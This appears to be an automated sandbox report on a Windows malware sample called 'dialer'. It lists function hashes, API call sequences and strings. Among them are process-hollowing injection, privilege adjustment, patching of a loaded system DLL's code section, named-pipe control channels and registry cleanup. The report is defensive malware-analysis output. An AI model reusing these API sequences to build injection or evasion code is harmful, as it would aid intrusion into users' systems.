Opcode ID: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
Instruction ID: f3e77400a0266606eb3020b457ef24817696e3b0389e9f606a5bd65f83fe99d4
Opcode Fuzzy Hash: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
Instruction Fuzzy Hash: 78B15F75A0CA52C6EB2ABF11E84467A37A1FF84B84F004135CA4E97754EF3EE945E740

Function 00007FF6473414E4 Relevance: 19.6, APIs: 13, Instructions: 130
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF647341517
HeapAlloc.KERNEL32 ref: 00007FF64734152A
GetProcessHeap.KERNEL32 ref: 00007FF647341538
HeapAlloc.KERNEL32 ref: 00007FF647341549
K32EnumProcesses.KERNEL32 ref: 00007FF647341563
OpenProcess.KERNEL32 ref: 00007FF647341591
K32EnumProcessModules.KERNEL32 ref: 00007FF6473415B6
ReadProcessMemory.KERNELBASE ref: 00007FF6473415ED
CloseHandle.KERNELBASE ref: 00007FF647341629
GetProcessHeap.KERNEL32 ref: 00007FF64734163B
RtlFreeHeap.NTDLL ref: 00007FF647341649
GetProcessHeap.KERNEL32 ref: 00007FF64734164F
RtlFreeHeap.NTDLL ref: 00007FF64734165D

Memory Dump Source

Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true

Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd

Similarity

API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
String ID:
API String ID: 4084875642-0
Opcode ID: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
Instruction ID: 3f348f23ac28e14a6baf95ff6b64399acfeba45036cdd078d437edb8698d600e
Opcode Fuzzy Hash: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
Instruction Fuzzy Hash: E851CE32B19A92DAEB6AFF22E8446A933A0FB49B84F444034DE4E97754DE3DD845D700

Function 00007FF647341C64 Relevance: 9.1, APIs: 6, Instructions: 88
memorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 00007FF647341CB3
SetEntriesInAclW.ADVAPI32 ref: 00007FF647341D14
LocalAlloc.KERNEL32 ref: 00007FF647341D24
InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF647341D3A
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF647341D52
CreateNamedPipeW.KERNELBASE ref: 00007FF647341D94

Memory Dump Source

Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true

Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd

Similarity

API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
String ID:
API String ID: 3197395349-0
Opcode ID: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
Instruction ID: cd4592de90c7b3895364f23643355ae17ea8882553ac6a970cfb5cc25dfb9991
Opcode Fuzzy Hash: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
Instruction Fuzzy Hash: AF418D73A18A51CAE761EF24E4847AD37B4FB44798F40023AEA4D83B98DF79D508DB40

Function 00007FF6473417F8 Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF64734180D
HeapAlloc.KERNEL32 ref: 00007FF64734181E

Part of subcall function 00007FF6473414E4: GetProcessHeap.KERNEL32 ref: 00007FF647341517
Part of subcall function 00007FF6473414E4: HeapAlloc.KERNEL32 ref: 00007FF64734152A
Part of subcall function 00007FF6473414E4: GetProcessHeap.KERNEL32 ref: 00007FF647341538
Part of subcall function 00007FF6473414E4: HeapAlloc.KERNEL32 ref: 00007FF647341549
Part of subcall function 00007FF6473414E4: K32EnumProcesses.KERNEL32 ref: 00007FF647341563
Part of subcall function 00007FF6473414E4: OpenProcess.KERNEL32 ref: 00007FF647341591
Part of subcall function 00007FF6473414E4: K32EnumProcessModules.KERNEL32 ref: 00007FF6473415B6
Part of subcall function 00007FF6473414E4: ReadProcessMemory.KERNELBASE ref: 00007FF6473415ED
Part of subcall function 00007FF6473414E4: CloseHandle.KERNELBASE ref: 00007FF647341629
Part of subcall function 00007FF6473414E4: GetProcessHeap.KERNEL32 ref: 00007FF64734163B
Part of subcall function 00007FF6473414E4: RtlFreeHeap.NTDLL ref: 00007FF647341649
Part of subcall function 00007FF6473414E4: GetProcessHeap.KERNEL32 ref: 00007FF64734164F
Part of subcall function 00007FF6473414E4: RtlFreeHeap.NTDLL ref: 00007FF64734165D

OpenProcess.KERNEL32 ref: 00007FF647341865
TerminateProcess.KERNEL32 ref: 00007FF647341878
CloseHandle.KERNEL32 ref: 00007FF647341881
GetProcessHeap.KERNEL32 ref: 00007FF647341891

Memory Dump Source

Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true

Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd

Similarity

API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
String ID:
API String ID: 1323846700-0
Opcode ID: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
Instruction ID: 492b639e1d5918d7b1d9212c744ab24ea9d11d64bb0b3fadc86d18ae1c090b59
Opcode Fuzzy Hash: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
Instruction Fuzzy Hash: 17114921F0DA52C6EB1EBB67E80407967B1EF89B94F088038DE0D93755EE3EE8459700

Function 00007FF647342078 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 128
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCpyW.SHLWAPI ref: 00007FF6473420AA
StrCatW.SHLWAPI ref: 00007FF6473420B8
GetModuleHandleW.KERNEL32 ref: 00007FF6473420C1
GetCurrentProcess.KERNEL32 ref: 00007FF64734210C
K32GetModuleInformation.KERNEL32 ref: 00007FF647342120
CreateFileW.KERNELBASE ref: 00007FF647342150
CreateFileMappingW.KERNELBASE ref: 00007FF64734217B
MapViewOfFile.KERNELBASE ref: 00007FF64734219F
lstrcmpiA.KERNEL32 ref: 00007FF6473421EA
VirtualProtect.KERNELBASE ref: 00007FF647342221
VirtualProtect.KERNELBASE ref: 00007FF64734224F
CloseHandle.KERNELBASE ref: 00007FF647342258
CloseHandle.KERNEL32 ref: 00007FF647342261
FreeLibrary.KERNEL32 ref: 00007FF64734226A

Strings

C:\Windows\System32\, xrefs: 00007FF64734209B
.text, xrefs: 00007FF6473421E3

Memory Dump Source

Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true

Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd

Similarity

API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
String ID: .text$C:\Windows\System32\
API String ID: 2721474350-832442975
Opcode ID: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
Instruction ID: 813d2ac4bf84602fca093ffd5793b31180814fb95abe8befea67085b620cb89c
Opcode Fuzzy Hash: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
Instruction Fuzzy Hash: B0516D3670CA86C2EB6AFB11E95866A73A0FB88B88F044131DE4E53794DF3DD409D700

Function 00007FF647342D84 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
sleepfilepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF647341C64: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF647341CB3
Part of subcall function 00007FF647341C64: SetEntriesInAclW.ADVAPI32 ref: 00007FF647341D14
Part of subcall function 00007FF647341C64: LocalAlloc.KERNEL32 ref: 00007FF647341D24
Part of subcall function 00007FF647341C64: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF647341D3A
Part of subcall function 00007FF647341C64: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF647341D52
Part of subcall function 00007FF647341C64: CreateNamedPipeW.KERNELBASE ref: 00007FF647341D94

Sleep.KERNEL32 ref: 00007FF647342DA9
ConnectNamedPipe.KERNELBASE ref: 00007FF647342DB6
ReadFile.KERNELBASE ref: 00007FF647342DD9
WriteFile.KERNEL32 ref: 00007FF647342E07
Sleep.KERNEL32 ref: 00007FF647342E14
DisconnectNamedPipe.KERNELBASE ref: 00007FF647342E1D

Strings

\\.\pipe\dialerchildproc64, xrefs: 00007FF647342D91
M, xrefs: 00007FF647342DFA

Memory Dump Source

Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true

Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
String ID: M$\\.\pipe\dialerchildproc64
API String ID: 2203880229-3489460547
Opcode ID: 7d22ea23ef86ef8925f3c0e3dc4e470fe94490edd279db0f7d690e2db9d12c90
Instruction ID: 8b1ce667abdce8486175a141b6d6e556f743b52185798256332db40b0312d224
Opcode Fuzzy Hash: 7d22ea23ef86ef8925f3c0e3dc4e470fe94490edd279db0f7d690e2db9d12c90
Instruction Fuzzy Hash: EC116522A1C642D2EB19FF21E8143B96760EF85BA0F444234E95F976D4CF7EE548E700

Function 00007FF64734228C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
sleeppipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF647341C64: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF647341CB3
Part of subcall function 00007FF647341C64: SetEntriesInAclW.ADVAPI32 ref: 00007FF647341D14
Part of subcall function 00007FF647341C64: LocalAlloc.KERNEL32 ref: 00007FF647341D24
Part of subcall function 00007FF647341C64: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF647341D3A
Part of subcall function 00007FF647341C64: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF647341D52
Part of subcall function 00007FF647341C64: CreateNamedPipeW.KERNELBASE ref: 00007FF647341D94

Sleep.KERNEL32 ref: 00007FF6473422B1
ConnectNamedPipe.KERNELBASE ref: 00007FF6473422BE
ReadFile.KERNEL32 ref: 00007FF6473422E1
Sleep.KERNEL32 ref: 00007FF647342302
DisconnectNamedPipe.KERNEL32 ref: 00007FF64734230B

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00007FF647342299

Memory Dump Source

Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true

Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 2071455217-3440882674
Opcode ID: 5695317b32aa55875ab713aa7e4462bbb3149900d195a386a470b0f830d0d176
Instruction ID: 57597655738c5c0c4923b92a21c6b622028ef036fb2d53ec939b7f366bd46f96
Opcode Fuzzy Hash: 5695317b32aa55875ab713aa7e4462bbb3149900d195a386a470b0f830d0d176
Instruction Fuzzy Hash: AA017120A1C646D1EA1EFB21E9043796770AF45BA0F144234D65F936E4CF7EE448EB00

Function 00007FF647342CC0 Relevance: 9.1, APIs: 6, Instructions: 58
memorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF647342CDB
HeapAlloc.KERNEL32 ref: 00007FF647342CEF
GetProcessHeap.KERNEL32 ref: 00007FF647342CF8
HeapAlloc.KERNEL32 ref: 00007FF647342D06
K32EnumProcesses.KERNEL32 ref: 00007FF647342D21
Sleep.KERNEL32 ref: 00007FF647342D79

Memory Dump Source

Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true

Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd

Similarity

API ID: Heap$AllocProcess$EnumProcessesSleep
String ID:
API String ID: 3676546796-0
Opcode ID: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
Instruction ID: d25cf7ca67fccc77c7866c974c472fcfe03b70f615c0424ee0f23640833530ac
Opcode Fuzzy Hash: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
Instruction Fuzzy Hash: E1218133A0C612CBE719FB16E95453A7771FB86B80F148038DA5A57B64CE3EE844DB40

Function 00007FF6473419AC Relevance: 4.5, APIs: 3, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(?,?,?,00007FF64734110E), ref: 00007FF6473419CA
IsWow64Process.KERNEL32(?,?,?,00007FF64734110E), ref: 00007FF6473419E0
CloseHandle.KERNELBASE(?,?,?,00007FF64734110E), ref: 00007FF6473419FB

Memory Dump Source

Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true

Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd

Similarity

API ID: Process$CloseHandleOpenWow64
String ID:
API String ID: 10462204-0
Opcode ID: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
Instruction ID: 12c8a6143ce2f7e880850675ceff6b19a7eb07179336f35ff03bfdff227a2378
Opcode Fuzzy Hash: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
Instruction Fuzzy Hash: 48F01D22B0DB9282EB59AF16B5841296661FB88BC0F449039EA8D83758DF3ED845CB00

Function 00007FF647342314 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF647342328: VerSetConditionMask.NTDLL ref: 00007FF647342397
Part of subcall function 00007FF647342328: VerSetConditionMask.NTDLL ref: 00007FF6473423A8
Part of subcall function 00007FF647342328: VerSetConditionMask.NTDLL ref: 00007FF6473423B9
Part of subcall function 00007FF647342328: VerifyVersionInfoW.KERNEL32 ref: 00007FF6473423CC
Part of subcall function 00007FF647342328: GetCurrentProcessId.KERNEL32 ref: 00007FF6473423DE
Part of subcall function 00007FF647342328: OpenProcess.KERNEL32 ref: 00007FF6473423EE
Part of subcall function 00007FF647342328: OpenProcessToken.ADVAPI32 ref: 00007FF64734240F
Part of subcall function 00007FF647342328: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF647342429
Part of subcall function 00007FF647342328: AdjustTokenPrivileges.KERNELBASE ref: 00007FF64734246D
Part of subcall function 00007FF647342328: GetLastError.KERNEL32 ref: 00007FF647342477
Part of subcall function 00007FF647342328: CloseHandle.KERNELBASE ref: 00007FF647342480
Part of subcall function 00007FF647342328: FindResourceExA.KERNEL32 ref: 00007FF647342494
Part of subcall function 00007FF647342328: SizeofResource.KERNEL32 ref: 00007FF6473424AB
Part of subcall function 00007FF647342328: LoadResource.KERNEL32 ref: 00007FF6473424C4
Part of subcall function 00007FF647342328: LockResource.KERNEL32 ref: 00007FF6473424D6
Part of subcall function 00007FF647342328: GetCurrentProcessId.KERNEL32 ref: 00007FF6473424E3

ExitProcess.KERNEL32 ref: 00007FF64734231F

Memory Dump Source

Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true

Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd

Similarity

API ID: Process$Resource$ConditionMask$CurrentOpenToken$AdjustCloseErrorExitFindHandleInfoLastLoadLockLookupPrivilegePrivilegesSizeofValueVerifyVersion
String ID:
API String ID: 2329183550-0
Opcode ID: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
Instruction ID: 92fd4c9d4bf5e523b387991ca1588cf5da7e3d4d1533141ee0b86d24ca0661c9
Opcode Fuzzy Hash: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
Instruction Fuzzy Hash: FCA00210F1D682C2EA0FB7B5695A07C12716F95702F901834D00AF7292DE3F64596731

Non-executed Functions

Function 00007FF6473426E8 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 292
memoryregistryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32 ref: 00007FF64734276B

Part of subcall function 00007FF6473419AC: OpenProcess.KERNEL32(?,?,?,00007FF64734110E), ref: 00007FF6473419CA
Part of subcall function 00007FF6473419AC: IsWow64Process.KERNEL32(?,?,?,00007FF64734110E), ref: 00007FF6473419E0
Part of subcall function 00007FF6473419AC: CloseHandle.KERNELBASE(?,?,?,00007FF64734110E), ref: 00007FF6473419FB

Part of subcall function 00007FF6473410C0: OpenProcess.KERNEL32 ref: 00007FF64734112C
Part of subcall function 00007FF6473410C0: OpenProcess.KERNEL32 ref: 00007FF64734114B
Part of subcall function 00007FF6473410C0: K32GetModuleFileNameExW.KERNEL32 ref: 00007FF647341170
Part of subcall function 00007FF6473410C0: PathFindFileNameW.SHLWAPI ref: 00007FF64734117E
Part of subcall function 00007FF6473410C0: lstrlenW.KERNEL32 ref: 00007FF64734118A
Part of subcall function 00007FF6473410C0: StrCpyW.SHLWAPI ref: 00007FF6473411A1
Part of subcall function 00007FF6473410C0: CloseHandle.KERNEL32 ref: 00007FF6473411AD
Part of subcall function 00007FF6473410C0: StrCmpIW.SHLWAPI ref: 00007FF6473411ED
Part of subcall function 00007FF6473410C0: NtQueryInformationProcess.NTDLL ref: 00007FF647341221
Part of subcall function 00007FF6473410C0: OpenProcessToken.ADVAPI32 ref: 00007FF64734124B

RegOpenKeyExW.ADVAPI32 ref: 00007FF647342807
RegDeleteValueW.ADVAPI32 ref: 00007FF64734281F
ExitProcess.KERNEL32 ref: 00007FF647342843
GetProcessHeap.KERNEL32 ref: 00007FF64734284A
HeapAlloc.KERNEL32 ref: 00007FF64734285D
K32EnumProcesses.KERNEL32 ref: 00007FF64734287A
ExitProcess.KERNEL32 ref: 00007FF64734291A

Strings

open, xrefs: 00007FF647342AEC
dialerstager, xrefs: 00007FF647342818
SOFTWARE, xrefs: 00007FF6473427F9

Memory Dump Source

Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true

Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd

Similarity

API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
String ID: SOFTWARE$dialerstager$open
API String ID: 3276259517-3931493855
Opcode ID: cc2dfd10ca6ce89d0433c572e31964bbe7f0f3f3498935daffa8bcdb63cf822c
Instruction ID: 4bca7251015f2e9e768539bc645f45dab2f7dd648f76dc7dff62bc290998e547
Opcode Fuzzy Hash: cc2dfd10ca6ce89d0433c572e31964bbe7f0f3f3498935daffa8bcdb63cf822c
Instruction Fuzzy Hash: 7DD13D62A0C682C6EB7EFF2599042F923A5FF44748F014135E90ED7695DE3EEA04E740

Function 00007FF647341DB4 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162
injectionthreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 00007FF647341E78
VirtualAllocEx.KERNEL32 ref: 00007FF647341EA7
WriteProcessMemory.KERNEL32 ref: 00007FF647341ECC
WriteProcessMemory.KERNEL32 ref: 00007FF647341F08
VirtualAlloc.KERNEL32 ref: 00007FF647341F3B
GetThreadContext.KERNEL32 ref: 00007FF647341F57
WriteProcessMemory.KERNEL32 ref: 00007FF647341F7F
SetThreadContext.KERNEL32 ref: 00007FF647341F9D
ResumeThread.KERNEL32 ref: 00007FF647341FAD
OpenProcess.KERNEL32 ref: 00007FF647341FCC
TerminateProcess.KERNEL32 ref: 00007FF647341FDC

Strings

@, xrefs: 00007FF647341E9F

Memory Dump Source

Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true

Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd

Similarity

API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
String ID: @
API String ID: 3462610200-2766056989
Opcode ID: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
Instruction ID: 8df78e516d6b14f41f8cbbb8c05d800459b2dc647212d3dc6ffe7da00a8c1416
Opcode Fuzzy Hash: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
Instruction Fuzzy Hash: D861A132B09A11C6E769AF26D84076E77E1FB48B88F004235DE4D97B58DF3AE845D740

Function 00007FF647341AC4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106memorycomCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF647341AEB
SysAllocString.OLEAUT32 ref: 00007FF647341AFB
CoInitializeEx.OLE32 ref: 00007FF647341B08
CoInitializeSecurity.OLE32 ref: 00007FF647341B3F
CoCreateInstance.OLE32 ref: 00007FF647341B84
VariantInit.OLEAUT32 ref: 00007FF647341B96
CoUninitialize.OLE32 ref: 00007FF647341C2F
SysFreeString.OLEAUT32 ref: 00007FF647341C38
SysFreeString.OLEAUT32 ref: 00007FF647341C41

Strings

dialersvc64, xrefs: 00007FF647341AE2

Memory Dump Source

Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true

Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID: dialersvc64
API String ID: 4184240511-3881820561
Opcode ID: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
Instruction ID: 9dfccbbc72e7d50390d5706d95404b040c750d7e05bafb5cbb0df3a7e8c7fdba
Opcode Fuzzy Hash: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
Instruction Fuzzy Hash: 6F415A32B08B46D6E715EF25E8442AD73B5FB88B88F044135EE4E97A24DF3AE549D300

Function 00007FF647341000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF647341034
RegDeleteKeyW.ADVAPI32 ref: 00007FF647341045
RegEnumKeyExW.ADVAPI32 ref: 00007FF647341082
RegCloseKey.ADVAPI32 ref: 00007FF647341093
RegDeleteKeyExW.ADVAPI32 ref: 00007FF6473410B0

Strings

SOFTWARE\dialerconfig, xrefs: 00007FF647341026, 00007FF64734109C

Memory Dump Source

Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true

Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd

Similarity

API ID: Delete$CloseEnumOpen
String ID: SOFTWARE\dialerconfig
API String ID: 3013565938-461861421
Opcode ID: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
Instruction ID: c37a31dd6aa742a867d780fd5a19b365942d3a4ef96dfea09dd43e005c0dea9c
Opcode Fuzzy Hash: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
Instruction Fuzzy Hash: 92119122A1CA85C1E765AF24E8487F92364FB48798F400335D64D8AA98CF3ED248DB15

Function 00007FF647342C18 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF647342C53
WriteFile.KERNEL32 ref: 00007FF647342C7B
WriteFile.KERNEL32 ref: 00007FF647342C9E
CloseHandle.KERNEL32 ref: 00007FF647342CA7

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00007FF647342C30

Memory Dump Source

Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true

Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd

Similarity

API ID: File$Write$CloseCreateHandle
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 148219782-3440882674
